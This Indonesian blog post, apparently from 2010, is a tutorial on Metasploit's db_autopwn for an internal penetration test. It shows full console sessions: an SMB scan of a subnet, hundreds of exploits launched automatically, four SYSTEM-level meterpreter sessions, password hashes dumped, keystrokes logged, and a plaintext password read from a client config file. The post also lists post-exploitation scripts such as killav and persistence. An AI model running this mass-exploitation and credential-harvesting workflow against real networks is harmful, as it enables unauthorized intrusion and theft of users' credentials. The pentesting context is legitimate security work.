Autopwn dengan metasploit

Ketika kita melakukan pekerjaan penetration testing terutama dalam lingkungan internal client, maka umumnya langkah pertama yang dilakukan adalah proses scanning. Setiap konsultan memiliki metode yang berbeda-beda, ada yang melakukan scanning secara cepat untuk memetakan posisi target yang alive secara cepat, ada yang melakukan proses scanning secara mendalam untuk kemudian di review, dsb.

Jika kita tidak diberikan target spesifik (mis: target ditentukan berupa network yang berisi server farm dimana identifikasi servis harus dilakukan secara hati-hati), maka mass-owning dengan tujuan mendapatkan target sebanyak dan semudah mungkin akan diperlukan. Dalam hal ini termasuk mesin-mesin user yang melakukan operasional sehari-hari dalam lingkungan client. Tujuannya tentu saja untuk mendapatkan beragam informasi seperti aplikasi client, data-data penting (contoh: username / password), email, dsb yang kemudian akan digunakan pada proses gaining menuju sistem yang lebih dalam dan penting.

Metasploit merupakan salah satu tools yang paling mudah digunakan untuk keperluan ini, terlebih lagi karena metasploit merupakan aplikasi opensource dengan kemampuan yang powerful. Ada beragam cara untuk menentukan kira-kira exploit jenis apa yang akan memberikan kita shell dari puluhan atau ratusan mesin target dalam suatu network, diantaranya tentu saja dengan asumsi dilingkungan internal fasilitas file sharing akan di aktifkan. File sharing berarti protocol SMB pada windows, yang akan membawa kita pada proses scanning port 139/445.

Hole pada protocol SMB merupakan salah satu favorite saya ketika ingin memulai proses mass-owning secara cepat. Metasploit menyediakan fitur db_autopwn dimana kita dapat melakukan scanning menggunakan nmap pada port tertentu, hasilnya akan dimasukan kedalam database (default database yang digunakan metasploit adalah sqlite3), dan kemudian metasploit akan mencari exploit-exploit yang sesuai (dalam hal ini penyesuaian dilakukan berdasarkan port target, 139/445) untuk secara membabi-buta melakukan mass-owning pada target. Sekilas terlihat sangat biasa, namun proses otomatisasi ini sangat bermanfaat bagi konsultan.

Berikut ini salah satu contoh penggunaannya,


$ ../bin/ruby msfconsole

_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|

=[ metasploit v3.4.0-dev [core:3.4 api:1.0]
+ -- --=[ 545 exploits - 257 auxiliary
+ -- --=[ 207 payloads - 23 encoders - 8 nops
=[ svn r9012 updated today (2010.04.05)

msf > db_create 10.69.2.0.txt
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: 10.69.2.0.txt
msf > db_nmap -p 445 10.69.2.1/24

Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2010-04-06 15:59 WIT
mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.69.2.1
Host is up (0.0039s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds

Nmap scan report for 10.69.2.3
Host is up (0.0017s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds

Nmap scan report for 10.69.2.5
Host is up (0.0017s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds

Nmap scan report for 10.69.2.135
Host is up (0.0017s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds

Nmap scan report for 10.69.2.202
Host is up (0.0015s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds

Nmap scan report for 10.69.2.253
Host is up (0.023s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds

Nmap scan report for 10.69.2.254
Host is up (0.0041s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds

Nmap done: 256 IP addresses (46 hosts up) scanned in 2.52 seconds
msf > db_autopwn -p -e
[*] (1/756 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 10.69.2.1:445...
[*] (2/756 [0 sessions]): Launching exploit/multi/samba/nttrans against 10.69.2.1:445...
[*] (3/756 [0 sessions]): Launching exploit/multi/samba/usermap_script against 10.69.2.1:445...
[*] (4/756 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 10.69.2.1:445...
[*] (5/756 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 10.69.2.1:445...
[*] (6/756 [0 sessions]): Launching exploit/solaris/samba/trans2open against 10.69.2.1:445...
[*] (7/756 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 10.69.2.1:445...

[*] (54/756 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 10.69.2.115:445...
[*] (55/756 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 10.69.2.115:445...
[*] (56/756 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 10.69.2.115:445...
[*] (57/756 [1 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 10.69.2.115:445...
[*] (58/756 [1 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 10.69.2.115:445...
[*] (59/756 [1 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.69.2.115:445...
[*] (60/756 [1 sessions]): Launching exploit/windows/smb/msdns_zonename against 10.69.2.115:445...
[*] (61/756 [1 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 10.69.2.115:445...
[*] (62/756 [1 sessions]): Launching exploit/windows/smb/psexec against 10.69.2.115:445...
[*] (63/756 [1 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 10.69.2.115:445...
[*] Meterpreter session 1 opened (10.69.2.133:59949 -> 10.69.2.10:32385)
[*] (64/756 [1 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 10.69.2.118:445...
[*] (65/756 [1 sessions]): Launching exploit/multi/samba/nttrans against 10.69.2.118:445...
[*] (66/756 [1 sessions]): Launching exploit/multi/samba/usermap_script against 10.69.2.118:445...

[*] (384/756 [2 sessions]): Launching exploit/solaris/samba/trans2open against 10.69.2.25:445...
[*] (385/756 [2 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 10.69.2.25:445...
[*] (386/756 [2 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 10.69.2.25:445...
[*] (387/756 [2 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 10.69.2.25:445...
[*] (388/756 [2 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 10.69.2.25:445...
[*] (389/756 [2 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 10.69.2.25:445...
[*] (390/756 [2 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 10.69.2.25:445...
[*] (391/756 [2 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 10.69.2.25:445...
[*] Meterpreter session 2 opened (10.69.2.133:61145 -> 10.69.2.19:5272)

[*] (756/756 [4 sessions]): Waiting on 1 launched modules to finish execution...
[*] (756/756 [4 sessions]): Waiting on 1 launched modules to finish execution...
[*] (756/756 [4 sessions]): Waiting on 0 launched modules to finish execution...

msf > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter NT AUTHORITY\SYSTEM @ MIMIN 10.69.2.133:59949 -> 10.69.2.10:32385
2 meterpreter NT AUTHORITY\SYSTEM @ MUMUN 10.69.2.133:61145 -> 10.69.2.19:5272
3 meterpreter NT AUTHORITY\SYSTEM @ MOMON 10.69.2.133:61655 -> 10.69.2.42:28353
4 meterpreter NT AUTHORITY\SYSTEM @ MAMAN 10.69.2.133:62029 -> 10.69.2.70:25435

Sangat mudah dan efisien. Selanjutnya kita bisa berinteraksi dengan salah satu target,


msf > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
992 SMSS.EXE x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
1064 CSRSS.EXE x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
1088 WINLOGON.EXE x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
1132 SERVICES.EXE x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
1144 LSASS.EXE x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
1284 SVCHOST.EXE x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1376 SVCHOST.EXE x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1468 SVCHOST.EXE x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1584 SVCHOST.EXE x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\System32\svchost.exe
1712 SVCHOST.EXE x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\svchost.exe
1784 ccSetMgr.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
1848 ccEvtMgr.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
1976 SPOOLSV.EXE x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
256 DefWatch.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Symantec AntiVirus\DefWatch.exe
312 R_SERVER.EXE x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\r_server.exe
468 Rtvscan.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Symantec AntiVirus\Rtvscan.exe
648 WDFMGR.EXE x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\wdfmgr.exe
372 Explorer.EXE x86 0 MIMIN\Administrator C:\WINDOWS\Explorer.EXE
1556 ALG.EXE x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe

Saat menggunakan metasploit, jauh lebih baik menggunakan payload meterpreter. Meterpreter sangat flexible, diantaranya kita dapat menggunakan meterpreter script untuk membuat proses pasca eksploitasi (post exploitation) secara otomatis juga. Berikut ini salah satu contoh nya:


meterpreter > run
run checkvm run hostsedit run packetrecorder run srt_webdrive_priv
run credcollect run keylogrecorder run persistence run uploadexec
run dumplinks run killav run pml_driver_config run virtualbox_sysenter_dos
run get_local_subnets run kitrap0d run prefetchtool run vnc
run get_pidgin_creds run memdump run remotewinenum run winbf
run getcountermeasure run metsvc run scheduleme run winenum
run getgui run migrate run schtasksabuse run wmic
run gettelnet run multicommand run scraper
run getvncpw run multiscript run screen_unlock
run hashdump run netenum run search_dwld
meterpreter > run get_local_subnets
Local subnet: 10.69.2.0/255.255.255.0
meterpreter > hashdump
Administrator:500:ca3ef416a1a74feeaad3b435b51404ee:0fece65b56667847d295837650213f55:::
ASPNET:1004:99dd4e23fffb09580a71caa5e99d91e5:3706b43c728bc80f32877d2bddb78c88:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1006:aa480fa90bacb34dde8e3c460f7d2b17:e7cdcd31f92ee807b492af0f35acde15:::
IUSR_ZULAF_113:1008:afe9ca156215a25bf0f64001926cdae4:36924f3d0a661bb219b06c4391f64990:::
IWAM_ZULAF_113:1009:934293856013aab8acde689c80f122c9:d2bbc11dead4983b814f0f7d7aaf2fb4:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:4abab1af24678f3f559c58fe310fa25b:::
meterpreter > screenshot
Screenshot saved to: /Volumes/Metasploit/trunk/CKqbQLKx.jpeg
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
admin
Gr9dikeid9
meterpreter > cat blablablaclient.ini
??[Client]
driver = thunder
location = earth:1337
application = p_earth_d
userID = earth
password = earth23udieu8

Begitulah perkenalan autowpn dengan metasploit. Pada bahasan selanjutnya kita akan membahas beragam fitur yang di-integrasikan pada metasploit maupun autopwn. Have fun!

Advertisements

One thought on “Autopwn dengan metasploit

  1. sangat menarik… sangat awam dengan metaexploit, tapi sangat tertarik dengan kata kata “focusing on low-level hacking technology”. Nanti mau saya coba dengan menggunakan virtual box di ubuntu ku… semoga bisa… soale belum pernah coba penetrasi2 gitu…

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s